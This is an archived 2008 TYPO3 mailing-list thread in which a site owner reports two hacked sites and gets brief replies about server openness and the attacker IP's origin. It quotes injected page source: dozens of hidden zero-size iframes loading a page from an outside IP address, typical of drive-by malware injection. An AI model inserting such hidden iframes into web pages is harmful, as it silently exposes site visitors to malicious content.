[TYPO3] Typo3 sites HACKED!
Roland Kaeser
roli8200 at yahoo.de
Thu Mar 20 14:46:16 CET 2008
Hello
What do You mean with "general public"? Isn't every webserver open to the public? Isn't that the main idea of the internet?
Roland
----- Ursprüngliche Mail ----
Von: Ton Akveld [netcreators] <ton at netcreators.com>
An: TYPO3 English <typo3-english at lists.netfielders.de>
Gesendet: Donnerstag, den 20. März 2008, 14:14:37 Uhr
Betreff: Re: [TYPO3] Typo3 sites HACKED!
Hi Theo,
This is probably caused by your server being to 'open' to the general
'public'...
The ip is from Hong Kong...
Good luck,
Ton
Theo Kotey schreef:
> Hi List
>
> Two of my Typo3-running website have been hacked. I am trying to figure
> out how but there is an unknown ip address 58.65.236.89 which belongs to
> HostFresh. Does anybody have an info on these guys?
>
> My website are quite slow and shows some error messages like
>
> Warning: Cannot modify header information - headers already sent by
> (output started at
> /home/micropro/public_html/typo3_src/t3lib/class.t3lib_timetrack.php:595)
> in /home/micropro/public_html/typo3_src/t3lib/class.t3lib_userauth.php
> on line 278
>
> When I debugg the site using Firebug this is what I get below
>
> ##########################################################################
>
> <html>
> <head>
> </head>
> <body _dragdropupload="true" onload="T3_onloadWrapper();">
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
> <iframe width="0" height="0" border="0"
> src="http://58.65.236.89/in3/index.php">
> </iframe>
>
> ##########################################################################
>
> I have no idea how the <iframe> tag got in there as I have never used it
>
> Regards
> Theo
> _______________________________________________
> TYPO3-english mailing list
> TYPO3-english at lists.netfielders.de
> http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-english
>
-----Integrierter Anhang folgt-----
_______________________________________________
TYPO3-english mailing list
TYPO3-english at lists.netfielders.de
http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-english
Lesen Sie Ihre E-Mails jetzt einfach von unterwegs.
www.yahoo.de/go
More information about the TYPO3-english
mailing list